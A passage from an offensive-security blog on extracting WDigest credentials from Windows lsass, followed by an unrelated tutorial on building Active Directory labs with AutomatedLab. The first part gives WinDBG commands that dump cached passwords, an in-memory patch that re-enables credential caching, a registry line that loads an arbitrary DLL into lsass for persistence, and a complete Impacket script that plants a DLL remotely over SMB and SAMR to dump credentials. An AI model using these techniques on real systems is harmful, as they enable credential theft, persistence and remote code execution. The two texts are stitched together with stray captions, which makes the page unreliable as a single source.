Following this struct are three LSA_UNICODE_STRING fields found at the following offsets:

  • 0x30 – Username
  • 0x40 – Hostname
  • 0x50 – Encrypted Password

Again we can check that we are on the right path with WinDBG using a command such as:

!list -x "dS @$extret+0x30" poi(wdigest!l_LogSessList)

This will dump cached usernames as:

 

And finally we can dump encrypted password using a similar command:

!list -x "db poi(@$extret+0x58)" poi(wdigest!l_LogSessList)

 

And there we have it, all the pieces required to extract WDigest credentials from memory.

So now that we have all the information needed for the extraction and decryption process, how feasible would it be to piece this together into a small standalone tool outside of Mimikatz? To explore this I’ve created a heavily commented POC which is available here. When executed on Windows 10 x64 (build 1809), it provides verbose information on the process of extracting creds:

how to be a hacker

 

By no means should this be considered OpSec safe, but it will hopefully give an example of how we can go about crafting alternative tooling.

Now that we understand how WDigest cached credentials are grabbed and decrypted, we can move onto another area affecting the collection of plain-text credentials, “UseLogonCredential”.

But UseLogonCredential is 0

So as we know, with everyone running around dumping cleartext credentials, Microsoft decided to disable support for this legacy protocol by default. Of course there will be some users who may be using WDigest, so to provide the option of re-enabling this, Microsoft pointed to a registry key of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential. Toggling this from ‘0’ to ‘1’ forces WDigest to start caching credentials again, which of course meant that pentesters were back in the game… however there was a catch, toggling this setting required a reboot of the OS, and I’ve yet to meet a client who would allow this outside of a test environment.

The obvious question is… why do you need to reboot the machine for this to take effect?

Edit: As pointed out by GentilKiwi, a reboot isn’t required for this change to take effect. I’ve added a review of why this is at the end of this section.

Let’s take a look at SpAcceptCredentials again, and after a bit of hunting we find this:

 

Here we can clearly see that there is a check for two conditions using global variables. If g_IsCredGuardEnabled is set to 1, or g_fParameter_UseLogonCredential is set to 0, we find that the code path taken is via LogSessHandlerNoPasswordInsert rather than the above LogSessHandlerPasswdSet call. As the name suggests, this function caches the session but not the password, resulting in the behaviour we normally encounter when popping Windows 2012+ boxes. It’s therefore reasonable to assume that this variable is controlled by the above registry key value based on its name, and we find this to be the case by tracing its assignment:

 

By understanding what variables within WDigest.dll control credential caching, can we subvert this without updating the registry? What if we update that g_fParameter_UseLogonCredential parameter during runtime with our debugger?

how to be a hacker

 

Resuming execution, we see that cached credentials are stored again:

 

Of course most things are possible when you have a kernel debugger hooked up, but if you have a way to manipulate lsass memory without triggering AV/EDR (see our earlier Cylance blog post for one example of how you would do this), then there is nothing stopping you from crafting a tool to manipulate this variable. Again I’ve created a heavily verbose tool to demonstrate how this can be done which can be found here.

This example will hunt for and update the g_fParameter_UseLogonCredential value in memory. If you are operating against a system protected with Credential Guard, the modifications required to also update this value are trivial and left as an exercise to the reader.

With our POC executed, we find that WDigest has now been re-enabled without having to set the registry key, allowing us to pull out credentials as they are cached:

how to be a hacker

 

Again this POC should not be considered as OpSec safe, but used as a verbose example of how you can craft your own.

Now of course this method of enabling WDigest comes with risks, mainly the WriteProcessMemory call into lsass, but if suited to the environment it offers a nice way to enable WDigest without setting a registry value. There are also other methods of acquiring plain-text credentials which may be more suited to your target outside of WDigest (memssp for one, which we will review in a further post).

Edit: As pointed out by GentilKiwi, a reboot is not required for UseLogonCredential to take effect… so back to the disassembler we go.

Reviewing other locations referencing the registry value, we find wdigest!DigestWatchParamKey which monitors a number of keys including:

how to be a hacker

 

The Win32 API used to trigger this function on update is RegNotifyKeyChangeValue:

how to be a hacker

 

And if we add a breakpoint on wdigest!DigestWatchParamKey in WinDBG, we see that this is triggered as we attempt to add a UseLogonCredential:

how to be a hacker

 

Bonus Round – Loading an arbitrary DLL into LSASS

So while digging around with a disassemler I wanted to look for an alternative way to load code into lsass while avoiding potentially hooked Win32 API calls, or by loading an SSP. After a bit of disassembly, I came across the following within lsasrv.dll:

how to be a hacker

 

This attempt to call LoadLibraryExW on a user provided value can be found within the function LsapLoadLsaDbExtensionDll and allows us to craft a DLL to be loaded into the lsass process, for example:

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:

        // Insert l33t payload here

        break;
    }

    // Important to avoid BSOD
    return FALSE;
}

It is important that at the end of the DllMain function, we return FALSE to force an error on LoadLibraryEx. This is to avoid the subsequent call to GetProcAddress. Failing to do this will result in a BSOD on reboot until the DLL or registry key is removed.

With a DLL crafted, all that we then need to do is create the above registry key:

New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "C:\xpnsec.dll"

Loading of the DLL will occur on system reboot, which makes it a potential persistence technique for privileged compromises, pushing your payload straight into lsass (as long as PPL isn’t enabled of course).

Bonus Round 2 – Loading arbitrary DLL into LSASS remotely

After some further hunting, a similar vector to that above was found within samsrv.dll. Again a controlled registry value is loaded into lsass by a LoadLibraryEx call:

how to be a hacker

 

Again we can leverage this by adding a registry key and rebooting, however triggering this case is a lot simpler as it can be fired using SAMR RPC calls.

Let’s have a bit of fun by using our above WDigest credential extraction code to craft a DLL which will dump credentials for us.

To load our DLL, we can use a very simple Impacket Python script to modify the registry and add a key to HKLM\SYSTEM\CurrentControlSet\Services\NTDS\DirectoryServiceExtPt pointing to our DLL hosted on an open SMB share, and then trigger the loading of the DLL using a call to hSamConnect RPC call. The code looks like this:

from impacket.dcerpc.v5 import transport, rrp, scmr, rpcrt, samr
from impacket.smbconnection import SMBConnection
def trigger_samr(remoteHost, username, password):
print(“[*] Connecting to SAMR RPC service”)
try:
rpctransport = transport.SMBTransport(remoteHost, 445, r’\samr’, username, password, “”, “”, “”, “”)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
except (Exception) as e:
print(“[x] Error binding to SAMR: %s” % e)
return
print(“[*] Connection established, triggering SamrConnect to force load the added DLL”)
# Trigger
samr.hSamrConnect(dce)
print(“[*] Triggered, DLL should have been executed…”)
def start(remoteName, remoteHost, username, password, dllPath):
winreg_bind = r’ncacn_np:445[\pipe\winreg]’
hRootKey = None
subkey = None
rrpclient = None
print(“[*] Connecting to remote registry”)
try:
rpctransport = transport.SMBTransport(remoteHost, 445, r’\winreg’, username, password, “”, “”, “”, “”)
except (Exception) as e:
print(“[x] Error establishing SMB connection: %s” % e)
return
try:
# Set up winreg RPC
rrpclient = rpctransport.get_dce_rpc()
rrpclient.connect()
rrpclient.bind(rrp.MSRPC_UUID_RRP)
except (Exception) as e:
print(“[x] Error binding to remote registry: %s” % e)
return
print(“[*] Connection established”)
print(“[*] Adding new value to SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPtr”)
try:
# Add a new registry key
ans = rrp.hOpenLocalMachine(rrpclient)
hRootKey = ans[‘phKey’]
subkey = rrp.hBaseRegOpenKey(rrpclient, hRootKey, “SYSTEM\\CurrentControlSet\\Services\\NTDS”)
rrp.hBaseRegSetValue(rrpclient, subkey[“phkResult”], “DirectoryServiceExtPt”, 1, dllPath)
except (Exception) as e:
print(“[x] Error communicating with remote registry: %s” % e)
return
print(“[*] Registry value created, DLL will be loaded from %s” % (dllPath))
trigger_samr(remoteHost, username, password)
print(“[*] Removing registry entry”)
try:
rrp.hBaseRegDeleteValue(rrpclient, subkey[“phkResult”], “DirectoryServiceExtPt”)
except (Exception) as e:
print(“[x] Error deleting from remote registry: %s” % e)
return
print(“[*] All done”)
print(“LSASS DirectoryServiceExtPt POC\n @_xpn_\n)
start(“192.168.0.111”, “192.168.0.111”, “test”, “wibble”, \\\\opensharehost\\ntds\\legit.dll”)

And in practice, we can see credentials pulled from memory:

 

The code for the DLL used can be found here, which is a modification of the earlier example.

So hopefully this post has given you an idea as to how WDigest credential caching works and how Mimikatz goes about pulling and decrypting passwords during "sekurlsa::wdigest". More importantly I hope that it will help anyone looking to craft something custom for their next assessment. I’ll be continuing by looking at other areas which are commonly used during an engagement, but if you have any questions or suggestions, give me a shout at the usual places.

Automated Lab

Automated Lab: Automate Your Active Directory Security Lab

Building an active directory security lab is not easy, it requires time and resources as well as skills. What if we had an automated way of doing all the hard work?

Well, that’s where AutomatedLab! Is convenient!
AutomatedLabgithub.com

AutomatedLab (abbreviated as AL ) is an automated construction framework for Windows environments developed by Microsoft . You can use it to create labs in a variety of Active Directory environments. In addition to the local Hyper-V environment, it can also be built on Azure. And what I personally think is the most powerful is that by passing the lab construction script (ps1) to another person, he/she can build the same environment. I think this is ideal for training purposes and general learning.

Alright, let’s use AutomatedLab to automatically build the ideal Active Directory lab environment!

AutomatedLab (AL) enables you to

  • Set up lab and test environments
  • On Hyper-v or Azure with multiple products
  • Including just a single VM quickly.

Require one:

  • .NET 4.7.1 (Windows PowerShell)
  • .NET Core 2+ (PowerShell 6+)

Require one: Hyper-V Host Azure Subscription

Finally:

  • Operating System DVD ISO Images

Installation

There are two options installing AutomatedLab:

  • You can use the MSI installer published on GitHub.
  • Or you install from the PowerShell Gallery using the cmdlet Install-Module.
    Please note that this is the ONLY way to install AutomatedLab and its dependencies in PowerShell Core/PowerShell 7 on both Windows and Linux/Azure Cloud Shell
Install-PackageProvider Nuget -Force
Install-Module AutomatedLab -AllowClobber

# If you are on Linux and are not starting pwsh with sudo
# This needs to executed only once per user - adjust according to your needs!
Set-PSFConfig -Module AutomatedLab -Name LabAppDataRoot -Value /home/youruser/.alConfig -PassThru | Register-PSFConfig

# Prepare sample content - modify to your needs

# Windows
New-LabSourcesFolder -Drive C

# Linux
Set-PSFConfig -Module AutomatedLab -Name LabSourcesLocation -Value /home/youruser/labsources -PassThru | Register-PSFConfig
New-LabSourcesFolder # Linux

From MSI

AutomatedLab (AL) is a bunch of PowerShell modules. To make the installation process easier, it is provided as an MSI.

Download Link: https://github.com/AutomatedLab/AutomatedLab/releases

There are not many choices when installing AL.

Install1

The options Typical and Complete are actually doing the same and install AL to the default locations. The PowerShell modules go to “C:\Program Files\WindowsPowerShell\Modules”, the rest to “C:\LabSources”.

As LabSources can grow quite big, you should go for a custom installation and put this component on a disk with enough free space to store the ISO files. This disk does not have to be an SSD. Do not change the location of the modules unless you really know what you are doing.

Install2

Very important to AL is the LabSources folder that should look like this:

Install3

If all that worked, you are ready to go.

Demo: See the power of AutomatedLab!

With AutomatedLab set up , try running the following PowerShell script with administrator privileges.

New-LabDefinition -Name Lab1 -DefaultVirtualizationEngine HyperV

Add-LabMachineDefinition -Name DC1 -Memory 1GB -OperatingSystem 'Windows Server 2019 Standard Evaluation (Desktop Experience)' -Roles RootDC -DomainName contoso.com
Add-LabMachineDefinition -Name Client1 -Memory 1GB -OperatingSystem 'Windows 10 Enterprise Evaluation' -DomainName contoso.com

Install-Lab

Show-LabDeploymentSummary -Detailed

Doing this will create a Win 10 virtual machine on Hyper-V .

In just four lines, Windows Server and Windows10 are installed, Active Directory is built, and the client Windows10 is domain- joined.
How exciting!

Setup

Let’s set it up right away. Unfortunately, machine specs are required to run virtual machines . You will also need to download the Operating System ISO file, so it might take some time for those who start from scratch and it highly depends on your internet speed.

Requirements

You need plenty of memory, storage, and processor. You need an environment where you can run multiple virtual machines at the same time.
At least 8GB of memory, depending on the virtual machines running at the same time. 16GB or 32GB is recommended depending on the number of virtual machines you are ging to create.

With storage as SSD, especially with NVMe SSD , the build time will be very fast.

Next step…

Keep the following enabled.
· BIOS on the screen Intel VT-X / AMD Enabling -V
· Windows Add in the deletion of features Hyper-V enabled related functions

VMWare for collisions with other virtualization software such as VMWare WorkStation is at 2004 Windows10 Hyper-V supports the platform.
If you want to use it in parallel, please update to Windows10 2004. Before 2004, you have no choice but to uninstall the virtualization software.
VirtualBox also seems to be compatible with the Hyper-V platform.

Installation

Install AutomatedLab
Start Powershell with administrator privileges and execute the following command.
Note: installation using msi may not be able to install all the necessary modules, so I do not recommend it.

Install-Module AutomatedLab -Force -AllowClobber

If you don’t have NuGet on your computer, you’ll be prompted to install NuGet, so follow the instructions to install it.

Installing LabSources Once
Once AutomatedLab is installed, install LabSources. LabSources are the folders where Labs are located.

> New-LabSourcesFolder

* If you want to install on another drive, specify with -DriveLetter.
(e.g “-Drive Letter D” etc.)

Getting an error  when executing an Automated Lab command

When you try to execute the Automated Lab command including this command, the following error may occur.

The’New-LabSourcesFolder’command was found in module’AutomatedLab’, but this module could not be loaded.

This is due to Powershell ‘s security enforcement policy, and there are two ways to resolve it.
1.  Permanently relax the execution policy
2.  Temporarily relax the execution policy by specifying the “-Exec bypass” option every time the Powershell window is executed.  * In this case, it is necessary to execute “Import-Module Automated Lab” every time when using AL.

The execution policy can be changed temporarily at the time of execution as shown in option 2, but when creating a lab configuration with Powershell ISE in the future , if you chose option 2, it will be blocked by the execution policy and execution will not be possible, so choose option 1.

Set-ExecutionPolicy Unrestricted

* Execute with administrator privileges

If you are concerned about security, return to the Restricted policy when you no longer use AL.

Whether to send diagnostic information when AutomatedLab is executed for the first time.

When you execute it for the first time, you will be asked the following questions.

Opt in to telemetry?

Whether to send diagnostic information. Please choose either Yes or No.

Download ISO file

AL is available if your ISO image contains a configuration file named install.wim. ISO files such as Windows 10 Pro downloaded using the
Windows Media Creation Tool do not contain wim files and cannot be used as is. The trial version of the ISO file includes install.wim, which you should use for verification purposes.

The trial version ISO file for each OS is as follows.

Windows Server 2019
https://www.microsoft.com/ja-jp/evalcenter/evaluate-windows-server-2019
Windows 10 Enterprise
https://www.microsoft.com/ja-jp/evalcenter/evaluate-windows-10-enterprise

Please prepare the English version (US) for all of these . The architecture is free, but this time we will use x64.
* You need to enter your name, company name, and phone number to download the ISO file.

After downloading the ISO file, place it in the ISOs folder inside the AL LabSources folder.
The LabSources folder is created directly under the C drive by default.

After deployment, use the Get-LabAvailableOperatingSystem command in Powershell to make sure the ISO file is recognized.

PS C:\WINDOWS\system32> Get-LabAvailableOperatingSystem |ft OperatingSystemImageName
20:30:25|00:48:57|00:48:57.052| Scanning 2 files for operating systems
Found 5 OS images.
OperatingSystemImageName
------------------------
Windows 10 Enterprise Evaluation
Windows Server 2019 Standard Evaluation
Windows Server 2019 Standard Evaluation (Desktop Experience)
Windows Server 2019 Datacenter Evaluation
Windows Server 2019 Datacenter Evaluation (Desktop Experience)

This completes the basic setup.

Let’s create our lab

Time required: 10-20 minutes (depending on machine specifications)

Since Sample Scripts exist in LabSources, you can understand the general method by looking at them.
Tutorials  on Github Wiki can help you.
https://github.com/AutomatedLab/AutomatedLab/wiki

In addition, the extensive documentation can be found at the following URL. However, it seems that it is not the latest, so be careful.
(For the latest information, you can only use Get-Help or read the code in the repository )
https://automatedlab.org/en/latest/

Let’s install Windows Server 2019.
First , run Windows Powershell  with administrator privileges.
Next, copy and paste the following commands to a text editor and save it as ps1 file.

# Declaration to create a lab called TestLab # Everything you 
set from now on is applied by executing the "Install-Lab" command 
# Default Virtualization Engine is Hyper-V. This is a required option. 
New-LabDefinition -Name TestLab -DefaultVirtualizationEngine HyperV


## Create a machine for Windows Server 2019 
# Powershell can split long command columns into multiple lines by putting a backticks (`) at the end. 
# -OperatingSystem: 
Get-LabAvailable 
Add-LabMachineDefinition using the name of OperatingSystemImageName that appears in OperatingSystem `
 -Name ws2019 `
 -Memory 2GB `
 -OperatingSystem 'Windows Server 2019 Standard Evaluation (Desktop Experience)'

#Apply and create lab settings 
Install-Lab

#Show deployment results 
Show-LabDeploymentSummary -Detailed

The edition is the same for both Standard and Datacenter as long as it is a trial version. If you want to use it for commercial use, it is best to use the Datacenter option in case you purchase a license.

Execute the script .

Once executed, the lab will start building.

Since the base image is created for each OS, it will take some time for the first time. The second and subsequent times are much faster.

After a while, the process will complete and you will see the Show-LabDeploymentSummary results.

If the account name and password are not specified when defining the machine, the information defined by default will be used.
As shown in the Summary, the administrator account is set to “Administrator” and the password is set to “Somepass1” by default.
The network settings are similar, by default a network with a subnet of 192.168.1.0 / 24 is created to avoid conflicting with the host’s network in the range 192.168.0.0/16.
You are not connected to the internet with this setting, but you can connect to your machine and do a lot of things.

Connect to the lab machine

Type the following commands at the shell prompt at the bottom of PowerShell ISE. You may want to keep the command window closed, as the command window on the right side of the screen may steal keyboard input.

RDP connection

You can use the Connect-LabVM command to make an RDP connection.

> Connect-LabVM ws2019

Enter “Administrator” as the user name and “Somepass 1″ as the password.

You can also use ” Remote Desktop Connection” (mstsc) directly. If you hit it on the command line :

> mstsc /v:ws2019
Establish a Powershell session with our lab machine

The lab machine has WinRM enabled by default, so PSSession is available.
By using Enter-LabPSSession, AL will use your credentials to establish the session.

> Enter-LabPSSession ws2019

[ws2019]: PS C:\Users\Administrator\Documents> whoami
ws2019\administrator
Have your lab machine run Powershell cmdlets

Let’s make sure that Invoke -LabCommand can execute arbitrary code.

> Invoke-LabCommand -ComputerName ws2019 -ScriptBlock {Write-Host (whoami)}
19:21:19|00:03:09|00:00:00.000| Executing lab command activity: '<unnamed>' on machines 'ws2019'
19:21:19|00:03:09|00:00:00.009| - Waiting for completion
ws2019\administrator
19:21:29|00:03:19|00:00:10.159| - Activity done

Invoke -LabCommand can specify a lab machine and use ScriptBlock to execute arbitrary PS code and OS commands. This time, the whoami command is output as standard output using the Write-Host cmdlet.
It’s not very useful at this point, but it’s sometimes used for post-processing after lab installation.

Create a domain environment

・Time required: 30-40 minutes

Next, based on “04 Single domain-joined server.ps1” in the Introduction folder of SampleScripts, create and build a script that installs Windows Server 2019 and sets the domain environment . This time we’ll set the domain administrator password with Add-Lab Domain Definition.

Paste the following script into PowerShell ISE and run it. Or you can paste it in a text editor and save it as filename.ps1 then run it on Powershell.
* It looks long, but most of them are comments (Tips).

# Delete if Lab already exists 
# Machine namespace is common to all labs, so be careful not to duplicate if you create while keeping the existing lab. 
Remove-Lab

# Declaration to create a lab called TestDomainLab 
#Everything you set from now on is applied by executing the "Install-Lab" command 
# Default Virtualization Engine is Hyper-V. This is a required option. 
New-LabDefinition -Name TestDomainLab -DefaultVirtualizationEngine HyperV

#Since DomainName is used on multiple machines, make it a variable. 
$TestDomain = 'al.corp' 

## Domain admin user information. 
$DomainAdminUser = "aladmin" 
$DomainAdminPassword = "[email protected]!"

## Set the user account at the time of OS installation for lab construction (local user). 
# Set-LabInstallationCredential is common within the lab. Overwriting is possible on the way. 
#For domain controllers, both Set-LabInstallationCredential and Add-LabDomainDefinition must match with the same information. 
# However, if you do so, you will have a "local administrator account" with the same information as the domain administrator account on a machine other than DC. 
#Therefore, when building a proper lab, kitting with the -InstallationUserCredential option of Add-LabMachineDefinition other than DC. #It is better to specify a local user separately. 
Set-LabInstallationCredential -Username $DomainAdminUser -Password $DomainAdminPassword

#Set domain administrator account 
Add-LabDomainDefinition -Name $TestDomain -AdminUser $DomainAdminUser -AdminPassword $DomainAdminPassword

## Create a domain controller 
# Powershell can split long command columns into multiple lines by putting a backticks (`) at the end. 
# -Roles: Specify a variable that indicates the role of the machine. Various settings are required for DC and SQL Server, but AL #predefines most of the settings in the form of Role. 
# Single or forest root domain controllers use the RootDC role. 
#See the About Roles section of the documentation for a list of # Roles. 
# -DomainName: Domain name. This time we tried to name it after Automated Lab. If you want to belong to the same domain, make each machine the same Domain Name. 
# This OS is not a desktop experience. This is recommended if you want to make the installation lighter.

Add-LabMachineDefinition `
-Name DC1 `
-Memory 2GB `
-OperatingSystem 'Windows Server 2019 Standard Evaluation' `
-Roles RootDC `
-DomainName $TestDomain


## the Windows10 machine is a client created (setup person who was in fact the client also WS2019 is fast) 
Add-LabMachineDefinition -Name Client1 -Memory 2GB -OperatingSystem 'Windows 10 Enterprise Evaluation' -DomainName $TestDomain


#Apply and create lab settings 
Install-Lab

# Show deployment results 
Show-LabDeploymentSummary -Detailed

As you can see in the comments, the Install-Lab command starts the creation. You can change the configuration as much as you want.
If possible, it’s more time-efficient to fix the configuration over and over, then add Install-Lab at the end and run it, rather than repeating a time-consuming deployment each time. There are many things you can’t understand until you try it, so let’s make it with scrap and build before you get used to it.

As a result, it took about 30 minutes.
f:id:lac_devblog:20210607164629p:plain

As I wrote in the comment of the script , due to the influence of Set-LabInstallationCredential, Client1 has a local administrator with the same information as the domain administrator account.
To avoid this, set up a local administrator account for kitting in the Add-LabMachineDefinition option.

The client also belongs to the al.corp domain .
f:id:lac_devblog:20210607164712p:plain

Domain Admins also includes the “aladmin” configured in the build script .

[DC1]: PS C:\Users\aladmin\Documents> net group "Domain Admins" /domain
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator aladmin                  
The command completed successfully.

It took a while to set up the domain and set up Windows 10, but it ‘s very easy to set up two machines from scratch and wait just 30 minutes for the domain to be set up with a cup of coffee.
Let’s check using Enter-LabPSSession and Connect-LabVM Commands.

What are the settings such as user account? → Let’s do our best

Unfortunately, AL covers the automatic setup of the machine for the sake of brevity.
After building the machine, I will do my best to write PowerShell for additional setup such as user accounts, group additions, and group policies .
User accounts can be easily added using the New-ADUser cmdlet on the domain controller.

Post Installation Activity

AL has a “PostInstallationActivity” function that automatically executes a script in the virtual machine after building the virtual machine . PostInstallationActivity can be described in the definition options for each machine. Create a TestLab folder in C:\LabSources\PostInstallationActivities and save the following script as PrepareDomain.ps1 in the TestLab folder.

Start-Transcript C:\Windows\Temp\postinstall.log -append

$users = @()
$users += @{Name = "abe"; Password = "[email protected]"}
$users += @{Name = "iijima"; Password = "[email protected]"}
$users += @{Name = "usui"; Password = "[email protected]"}

ForEach ($user in $users){
   $securePassword = $user.Password | ConvertTo-SecureString -AsPlainText -Force
   New-ADUser -Name $user.Name `
             -AccountPassword $securePassword `
             -PasswordNeverExpires $true `
             -Enabled $true 
}

Write-Output "Useradd done."

Stop-Transcript

As you can see, this is a script that puts usernames and passwords in an array and adds them to New-ADUser in turn .

I am able to manage users, groups and OUs with csv for each domain.

By default, the password complexity requirement is enabled, so if you want to set a weak password, you need to change the group policy.

Next, add the PostInstallationActivity option to the domain controller in the build script above .

$postInstallActivity = Get-LabPostInstallationActivity `
                   -ScriptFileName PrepareDomain.ps1 `
                   -DependencyFolder "C:\LabSources\PostInstallationActivities\TestLab"

# Domain Contoller
Add-LabMachineDefinition `
-Name DC1 `
-Memory 1GB `
-OperatingSystem 'Windows Server 2019 Standard Evaluation' `
-Roles RootDC `
-DomainName $TestDomain `
-PostInstallationActivity $postInstallActivity

In the $postInstallActivity variable, declare the location of the folder of the script as an option of the Get-LabPostInstallationActivity cmdlet, and build the lab again.

After installation, you can confirm that the user is properly created as shown below.

f:id:lac_devblog:20210607165057p:plain

Precautions after lab creation

In my build, I’ve identified the following security concerns in the default state: If you want to build a CTF-like environment and let others do it, please deal with these in advance.

– C:. \ Unattend Xml to include authentication information of kitting user
– AutoLogon is enabled by default, due to it included password in the HKLM\SECURITY\Policy\Secrets\DefaultPassword
– local administrator is enabled using in-kitting
-WinRM enabled
– UAC disabled
– Windows Firewall disabled

What do you think?

I would be more than happy to share the joy of building scripts for automating AD labs.
I enjoyed automation and wrote a lot of build scripts and PostInstallationActivity to create a vulnerable environment like the one below that could be set up in 2 hours fully; automatically.
Wayans corp

<script src=”https://gist.github.com/jimmwayans/daa86a8260aa74351206ef55769cb772.js”></script>

You can create two forests, connect MSSQL Database Links, Kerberoastable or ASReproastable, or RDP with Pth on a Restricted Admin machine, and you can create these complex environments with AutomatedLab (and lots of PowerShell ).
It was difficult but interesting to devise so that the NTLM hash always remains on a specific machine.

There are other ways to connect the virtual machine to the Internet, but it will be long, so I will omit it here. Check the SampleScripts folder for examples of their contents.
I enjoy validating the C2 framework by putting Squid on my router machine so that I can only reach the internet via a proxy.

Finally, I will end with a collection of frequently used AL commands.

ーーー

Frequently used commands

All help can be found in Read the Docs below.
https://automatedlab.org/en/latest/
Here are some frequently used commands.

Whole lab

View list of labs

Get-Lab -List 

View a list of already installed labs.
The displayed lab can import sessions with the Import-Lab command.

Lab session restoration
Import-Lab [Lab name]

Restore installed lab sessions. Required to operate the lab again after closing the PowerShell window when it was built . Lab information is imported into a
Powershell session, allowing you to stop and start machines, get information, connect, and take snapshots.

List of lab machines
Get-LabVM

View lab machine information.

Obtaining detailed information during lab installation
Show-LabDeploymentSummary -Detailed

Display all machine names and network information, including the administrator user password at the time of installation.

Lab removal
Remove-Lab

Lab machines, network adapters, etc. are all deleted.

Stop and start the machine

Stop for a while
Save-LabVM [-Name <computer name> | -All]

The argument is the computer name, but using “-All” applies all lab machines.
State such as memory is saved. When it starts, it returns to its original state.

stop
Stop-LabVM [-Name <computer name> | -All]

The argument is the computer name, but using “-All” applies all lab machines.
A shutdown signal is sent.

Start
Start-LabVM [-Name <computer name> | -All]

The argument is the computer name, but using “-All” applies all lab machines.

snap shot

Take a snapshot
Checkpoint-LabVM [-ComputerName <computer name> | -All] -SnapshotName <snapshot name>

The argument is the computer name, but using “-All” applies all lab machines.

  • Specify the snapshot name with Snapshotname. Required.
> Checkpoint-LabVM -All -SnapshotName InitialSetup

* If the snapshot (Checkpoint) is not displayed in either Get-LabVM Snapshot or Hyper-V Manager even after executing this, it is possible that the creation has failed due to insufficient free space. Let’s try creating it with Hyper-V Manager and check the error content obtained.

Checking the snapshot
Get-LabVMSnapshot [-ComputerName <computer name>] 

If nothing is specified, information on all lab machines will be displayed.

> Get-LabVMSnapshot

SnapshotName CreationTime       ComputerName
------------ ------------       ------------
InitialSetup 2020/08/21 0:04:06 ws2016      
second       2020/08/21 0:05:55 ws2016
Restore snapshot
Restore-LabVMSnapshot [-ComputerName <computer name> | -All] -SnapshotName <snapshot name>

The argument is the computer name, but using “-All” applies all lab machines.

  • Specify the snapshot name with Snapshotname. Required.
> Restore-LabVMSnapshot -All -SnapshotName InitialSetup

Machine connection

Establish a Powershell session with a lab machine
Enter-LabPSSession -ComputerName <computer name>

A Powershell session is established with PSRemoting . If the lab machine belongs to a domain , the authentication information will be used by the domain admins user for kitting that was used when building the lab. If it does not belong to a
domain , the local kitting user’s credentials are used.

RDP connection to lab machine
Connect-LabVM -ComputerName <computer name>

You can also use the standard Windows Remote Desktop Client (mstsc).

mstsc /v: <computer name>

others

Establish a PSRemoting session with any credentials
$sess = New-LabPSSession -ComputerName <computer name> -Credential <PSCredential>

You can establish a PS session with any credentials. This works well if you change the domain administrator password after installing the lab .

The lab cannot detect that the password has been changed after installation and fails to log in.

Using the return value PSSession, you can open a PS session for the lab machine as follows.

Enter-PSSession -ComputerName <Computer Name> -Session <PSSession>
File transfer (host-> lab machine)
Copy-LabFileItem -ComputerName <Computer name> -Path <Host computer source file / directory> -DestinationFolderPath <Lab machine destination folder>

Transfer files from the host computer to the lab machine.
The identification information of the administrator user at the time of lab construction is used. All files / folders are placed with read-only attributes.

File Transfer 2 (Host-> Lab Machine)
Send-File -SourceFilePath <Source file on host computer> -DestinationFolderPath <Destination folder on lab machine> -Session <PSSession>

Send-Directory -SourceFolderPath <Host computer source directory> -DestinationFolderPath <Lab machine destination folder> -Session <PSSession>

Send the file to the lab machine using any PSSession information. Effective if you change the domain administrator password
after installing the lab .

File transfer (lab machine-> host)
Receive-File -SourceFilePath <Lab source file> -DestinationFolderPath <Host computer destination folder> -Session <PSSession>

Receive-Directory -SourceFolderPath <Lab source file> -DestinationFolderPath <Host computer destination folder> -Session <PSSession>

Receive files from lab machines using arbitrary PSSession information. Effective if you change the domain administrator password
after installing the lab .

ーーー

I haven’t written enough yet, but I believe that if I write this far, some people will find it useful.
Let’s make your AD verification life easier with AutomatedLab!

My Powershell script for AL: @jimmwayans

Follow me on twitter for more infosec resources: @jimmwayans

× Need my services?